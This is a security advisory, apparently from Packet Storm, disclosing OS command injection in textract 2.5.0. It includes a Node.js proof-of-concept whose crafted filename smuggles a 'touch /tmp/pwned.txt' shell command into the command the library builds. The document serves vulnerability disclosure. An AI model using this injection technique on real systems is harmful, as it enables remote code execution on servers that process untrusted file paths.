9.8 / 10 CRITICAL
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Description
In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library...
Basic Information
ID
PACKETSTORM:219858
Published
Apr 27, 2026 at 00:00
Affected Product
textract (npm)
Affected Versions
2.5.0 (the version the advisory tested)
==================================================================================================================================
| # Title : textract 2.5.0 OS Command Injection via Unsafe Filename Handling Leading to RCE |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.npmjs.com/package/textract |
==================================================================================================================================
[+] Summary : In textract version 2.5.0, a security vulnerability allows OS command injection when untrusted file paths are processed by the library.
[+] POC : exploit-basic.js
const textract = require('textract');

// The "filename" is a shell payload: the double quote closes the quoted path
// argument in the command the library builds, `touch` then runs as a separate
// command, and the trailing `echo ".doc` reopens the quote so the string still
// ends in .doc and is routed to the .doc extractor. `;` and `touch` are POSIX
// shell syntax, so reproduce this on Linux/macOS. If the library refuses a
// missing path before shelling out, create a file with this exact name first
// (Linux permits quotes and semicolons in filenames).
const maliciousFileName = 'test"; touch /tmp/pwned.txt; echo ".doc';

console.log("[+] CVE-2026-26831 - textract OS Command Injection Exploit");
console.log("[+] Malicious filename:", maliciousFileName);
console.log("[+] Attempting to extract text from malicious file...");

// Extraction itself is expected to fail (there is no real document); the
// injected command runs when the path is interpolated into the shell command.
textract.fromFileWithPath(maliciousFileName, { preserveLineBreaks: true }, (error, text) => {
  if (error) {
    console.log("[!] Extraction failed (but command may have executed)");
    console.log("Error:", error.message);
  } else {
    console.log("[+] Extraction completed (injection might still have worked)");
    console.log("Extracted text:", text);
  }
  console.log("[*] Check if command executed: ls -la /tmp/pwned.txt");
});
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================